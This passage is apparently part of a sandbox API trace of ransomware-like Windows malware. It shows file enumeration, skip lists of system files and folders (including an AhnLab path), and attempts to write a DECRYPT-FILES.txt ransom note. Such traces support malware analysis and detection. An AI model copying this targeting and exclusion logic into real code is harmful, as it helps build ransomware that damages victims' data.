ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x3fa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceoledb35.dll", cAlternateFileName="SQLCEO~1.DLL")) returned 1 [0179.717] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="autorun.inf") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="boot.ini") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="desktop.ini") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="ntuser.dat") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="iconcache.db") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="bootsect.bak") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="ntuser.dat.log") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="thumbs.db") returned -1 [0179.717] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="Bootfont.bin") returned 1 [0179.717] lstrlenW (lpString="sqlceoledb35.dll") returned 16 [0179.717] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0179.717] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0179.717] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0179.717] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0179.717] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x114e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceqp35.dll", cAlternateFileName="SQLCEQ~1.DLL")) returned 1 [0179.717] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="autorun.inf") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="boot.ini") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="desktop.ini") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="ntuser.dat") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="iconcache.db") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="bootsect.bak") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="ntuser.dat.log") returned 1 [0179.717] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="thumbs.db") returned -1 [0179.717] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="Bootfont.bin") returned 1 [0179.717] lstrlenW (lpString="sqlceqp35.dll") returned 13 [0179.717] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0179.717] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0179.717] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0179.717] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0179.717] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 1 [0179.718] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0179.718] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="autorun.inf") returned 1 [0179.718] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="boot.ini") returned 1 [0179.718] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="desktop.ini") returned 1 [0179.718] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="ntuser.dat") returned 1 [0179.718] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="iconcache.db") returned 1 [0179.718] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="bootsect.bak") returned 1 [0179.718] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="ntuser.dat.log") returned 1 [0179.718] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="thumbs.db") returned -1 [0179.718] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="Bootfont.bin") returned 1 [0179.718] lstrlenW (lpString="sqlcese35.dll") returned 13 [0179.718] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0179.718] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0179.718] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0179.718] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0179.718] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 0 [0179.718] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0179.718] CloseHandle (hObject=0xffffffff) returned 0 [0179.718] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5\\", cAlternateFileName="")) returned 0 [0179.718] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.718] CloseHandle (hObject=0xffffffff) returned 0 [0179.718] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0179.718] lstrcmpW (lpString1="Microsoft Sync Framework", lpString2=".") returned 1 [0179.718] lstrcmpW (lpString1="Microsoft Sync Framework", lpString2="..") returned 1 [0179.718] lstrcatW (in: lpString1="Microsoft Sync Framework", lpString2="\\" | out: lpString1="Microsoft Sync Framework\\") returned="Microsoft Sync Framework\\" [0179.718] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Sync Framework\\" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\") returned="C:\\Program Files\\Microsoft Sync Framework\\" [0179.718] StrStrW (lpFirst="C:\\Program Files\\Microsoft Sync Framework\\", lpSrch="SQL") returned 0x0 [0179.718] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0179.718] lstrcmpW (lpString1="Microsoft Synchronization Services", lpString2=".") returned 1 [0179.718] lstrcmpW (lpString1="Microsoft Synchronization Services", lpString2="..") returned 1 [0179.718] lstrcatW (in: lpString1="Microsoft Synchronization Services", lpString2="\\" | out: lpString1="Microsoft Synchronization Services\\") returned="Microsoft Synchronization Services\\" [0179.719] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Synchronization Services\\" | out: lpString1="C:\\Program Files\\Microsoft Synchronization Services\\") returned="C:\\Program Files\\Microsoft Synchronization Services\\" [0179.719] StrStrW (lpFirst="C:\\Program Files\\Microsoft Synchronization Services\\", lpSrch="SQL") returned 0x0 [0179.719] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x886a52d0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x886a52d0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0179.719] lstrcmpW (lpString1="MSBuild", lpString2=".") returned 1 [0179.719] lstrcmpW (lpString1="MSBuild", lpString2="..") returned 1 [0179.719] lstrcatW (in: lpString1="MSBuild", lpString2="\\" | out: lpString1="MSBuild\\") returned="MSBuild\\" [0179.719] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="MSBuild\\" | out: lpString1="C:\\Program Files\\MSBuild\\") returned="C:\\Program Files\\MSBuild\\" [0179.719] StrStrW (lpFirst="C:\\Program Files\\MSBuild\\", lpSrch="SQL") returned 0x0 [0179.719] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8867f170, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8867f170, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0179.719] lstrcmpW (lpString1="Reference Assemblies", lpString2=".") returned 1 [0179.719] lstrcmpW (lpString1="Reference Assemblies", lpString2="..") returned 1 [0179.719] lstrcatW (in: lpString1="Reference Assemblies", lpString2="\\" | out: lpString1="Reference Assemblies\\") returned="Reference Assemblies\\" [0179.719] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Reference Assemblies\\" | out: lpString1="C:\\Program Files\\Reference Assemblies\\") returned="C:\\Program Files\\Reference Assemblies\\" [0179.719] StrStrW (lpFirst="C:\\Program Files\\Reference Assemblies\\", lpSrch="SQL") returned 0x0 [0179.719] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0179.719] lstrcmpW (lpString1="Uninstall Information", lpString2=".") returned 1 [0179.719] lstrcmpW (lpString1="Uninstall Information", lpString2="..") returned 1 [0179.719] lstrcatW (in: lpString1="Uninstall Information", lpString2="\\" | out: lpString1="Uninstall Information\\") returned="Uninstall Information\\" [0179.719] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Uninstall Information\\" | out: lpString1="C:\\Program Files\\Uninstall Information\\") returned="C:\\Program Files\\Uninstall Information\\" [0179.719] StrStrW (lpFirst="C:\\Program Files\\Uninstall Information\\", lpSrch="SQL") returned 0x0 [0179.719] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8827ac50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8827ac50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0179.719] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0179.719] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0179.719] lstrcatW (in: lpString1="Windows Defender", lpString2="\\" | out: lpString1="Windows Defender\\") returned="Windows Defender\\" [0179.719] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Defender\\" | out: lpString1="C:\\Program Files\\Windows Defender\\") returned="C:\\Program Files\\Windows Defender\\" [0179.719] StrStrW (lpFirst="C:\\Program Files\\Windows Defender\\", lpSrch="SQL") returned 0x0 [0179.719] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8867f170, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8867f170, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0179.719] lstrcmpW (lpString1="Windows Journal", lpString2=".") returned 1 [0179.719] lstrcmpW (lpString1="Windows Journal", lpString2="..") returned 1 [0179.719] lstrcatW (in: lpString1="Windows Journal", lpString2="\\" | out: lpString1="Windows Journal\\") returned="Windows Journal\\" [0179.719] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Journal\\" | out: lpString1="C:\\Program Files\\Windows Journal\\") returned="C:\\Program Files\\Windows Journal\\" [0179.719] StrStrW (lpFirst="C:\\Program Files\\Windows Journal\\", lpSrch="SQL") returned 0x0 [0179.719] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0179.719] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0179.719] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0179.720] lstrcatW (in: lpString1="Windows Mail", lpString2="\\" | out: lpString1="Windows Mail\\") returned="Windows Mail\\" [0179.720] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Mail\\" | out: lpString1="C:\\Program Files\\Windows Mail\\") returned="C:\\Program Files\\Windows Mail\\" [0179.720] StrStrW (lpFirst="C:\\Program Files\\Windows Mail\\", lpSrch="SQL") returned 0x0 [0179.720] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0179.720] lstrcmpW (lpString1="Windows Media Player", lpString2=".") returned 1 [0179.720] lstrcmpW (lpString1="Windows Media Player", lpString2="..") returned 1 [0179.720] lstrcatW (in: lpString1="Windows Media Player", lpString2="\\" | out: lpString1="Windows Media Player\\") returned="Windows Media Player\\" [0179.720] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Media Player\\" | out: lpString1="C:\\Program Files\\Windows Media Player\\") returned="C:\\Program Files\\Windows Media Player\\" [0179.720] StrStrW (lpFirst="C:\\Program Files\\Windows Media Player\\", lpSrch="SQL") returned 0x0 [0179.720] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0179.720] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0179.720] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0179.720] lstrcatW (in: lpString1="Windows NT", lpString2="\\" | out: lpString1="Windows NT\\") returned="Windows NT\\" [0179.720] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows NT\\" | out: lpString1="C:\\Program Files\\Windows NT\\") returned="C:\\Program Files\\Windows NT\\" [0179.720] StrStrW (lpFirst="C:\\Program Files\\Windows NT\\", lpSrch="SQL") returned 0x0 [0179.720] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x88254af0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88254af0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0179.720] lstrcmpW (lpString1="Windows Photo Viewer", lpString2=".") returned 1 [0179.720] lstrcmpW (lpString1="Windows Photo Viewer", lpString2="..") returned 1 [0179.720] lstrcatW (in: lpString1="Windows Photo Viewer", lpString2="\\" | out: lpString1="Windows Photo Viewer\\") returned="Windows Photo Viewer\\" [0179.720] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Photo Viewer\\" | out: lpString1="C:\\Program Files\\Windows Photo Viewer\\") returned="C:\\Program Files\\Windows Photo Viewer\\" [0179.720] StrStrW (lpFirst="C:\\Program Files\\Windows Photo Viewer\\", lpSrch="SQL") returned 0x0 [0179.720] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8827ac50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8827ac50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0179.720] lstrcmpW (lpString1="Windows Portable Devices", lpString2=".") returned 1 [0179.720] lstrcmpW (lpString1="Windows Portable Devices", lpString2="..") returned 1 [0179.720] lstrcatW (in: lpString1="Windows Portable Devices", lpString2="\\" | out: lpString1="Windows Portable Devices\\") returned="Windows Portable Devices\\" [0179.720] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Portable Devices\\" | out: lpString1="C:\\Program Files\\Windows Portable Devices\\") returned="C:\\Program Files\\Windows Portable Devices\\" [0179.720] StrStrW (lpFirst="C:\\Program Files\\Windows Portable Devices\\", lpSrch="SQL") returned 0x0 [0179.720] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0179.720] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0179.721] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0179.722] lstrcatW (in: lpString1="Windows Sidebar", lpString2="\\" | out: lpString1="Windows Sidebar\\") returned="Windows Sidebar\\" [0179.722] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Sidebar\\" | out: lpString1="C:\\Program Files\\Windows Sidebar\\") returned="C:\\Program Files\\Windows Sidebar\\" [0179.722] StrStrW (lpFirst="C:\\Program Files\\Windows Sidebar\\", lpSrch="SQL") returned 0x0 [0179.722] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar\\", cAlternateFileName="WI4223~1")) returned 0 [0179.722] FindClose (in: hFindFile=0x479738 | out: hFindFile=0x479738) returned 1 [0179.722] CloseHandle (hObject=0xffffffff) returned 0 [0179.722] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0179.722] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0179.722] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0179.722] lstrcatW (in: lpString1="Program Files (x86)", lpString2="\\" | out: lpString1="Program Files (x86)\\") returned="Program Files (x86)\\" [0179.722] lstrcatW (in: lpString1="C:\\", lpString2="Program Files (x86)\\" | out: lpString1="C:\\Program Files (x86)\\") returned="C:\\Program Files (x86)\\" [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\Program Files") returned="\\Program Files (x86)\\" [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch=":\\Windows") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\Games\\") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\All Users") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="AhnLab") returned 0x0 [0179.722] StrStrW (lpFirst="C:\\Program Files (x86)\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.722] lstrlenW (lpString="C:\\Program Files (x86)\\") returned 23 [0179.722] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.722] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Program Files (x86)\\\\0a16c9.tmp") returned 34 [0179.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\\\0a16c9.tmp" (normalized: "c:\\program files (x86)\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.723] GetLastError () returned 0x5 [0179.723] lstrlenW (lpString="C:\\Program Files (x86)\\") returned 23 [0179.723] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.723] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Program Files (x86)\\\\DECRYPT-FILES.txt") returned 41 [0179.723] CreateFileW (lpFileName="C:\\Program Files (x86)\\\\DECRYPT-FILES.txt" (normalized: "c:\\program files (x86)\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.723] lstrlenW (lpString="C:\\Program Files (x86)\\") returned 23 [0179.723] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="*" | out: lpString1="C:\\Program Files (x86)\\*") returned="C:\\Program Files (x86)\\*" [0179.723] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479738 [0179.723] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.723] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.723] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.723] lstrcmpW (lpString1="..", lpString2="..") returned 0 